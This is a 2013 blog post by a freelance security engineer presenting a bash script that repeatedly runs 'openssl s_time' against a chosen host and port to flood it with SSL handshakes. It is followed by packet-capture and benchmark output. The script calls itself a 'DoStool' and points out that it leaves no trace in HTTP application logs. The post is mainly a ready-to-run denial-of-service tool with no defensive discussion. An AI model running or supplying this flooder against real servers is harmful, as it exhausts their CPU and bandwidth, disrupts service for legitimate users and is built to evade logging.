Thursday, May 23, 2013

SSL flooder using openssl


We will re-look at another  simple ssl negotiation flooder  script that uses openssl. 

In this approach we repetitively  ask for the ssl handshake & negotiation. This repetitive requests, will raise the CPU and bandwidth for  the  delivery of  the cert and session setup.


Here’s the script;

#!/bin/bash
#
#

#rev 1.0

#  ssl  negotiation  generation & flooding via openssl and s_time
#
#    SSL neg flooder DoStool
#    Basically this tool loops the  ssl neg and request no HTTP traffic from the host,
#  so any HTTP application logs will not see any requests or L7 attacks
#
#
if [ ! $1 ]; then
            echo " Usage : $0  < The #of requests to execute>  <server or ip_address> <port> "
            echo ""
            echo "Example  $0  10 1.1.1.1 443 "
            echo ""

            exit 1
fi

#
i="0"

#
###set -xv
COUNTER=$1
MAX=9999999

if  (( $1 >= $MAX )) ; then

        echo "   "
        echo "Please make a request range of $MAX  or less"
        echo "   "
else


while [ $i -lt $COUNTER ] ;

  do   openssl s_time -connect $2:$3 -time 200  -nbio  -new 
  echo "   "
  echo " Request # $i "
  echo "   "
  i=$[$i + 1]

#   let "COUNTER += 1"
#
done

fi

And here's what tshark will decode;
 ( output shorten )

2013-05-23 16:05:20.912039    127.0.0.1 -> 127.0.0.1    TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
2013-05-23 16:05:20.913222    127.0.0.1 -> 127.0.0.1    TLSv1 190 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.913813    127.0.0.1 -> 127.0.0.1    TLSv1 115 Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.915249    127.0.0.1 -> 127.0.0.1    TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
1806 packets captured

And at the conclusion of each request, we will get some  benchmark numbers;

(output shorten)
 
ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt

55699 connections in 68.99s; 807.35 connections/user sec, bytes read 0
55699 connections in 201 real seconds, 0 bytes read per connection
  
 Request # 0


Ken Felix
Freelance Network/Security Engineer

No comments:

Post a Comment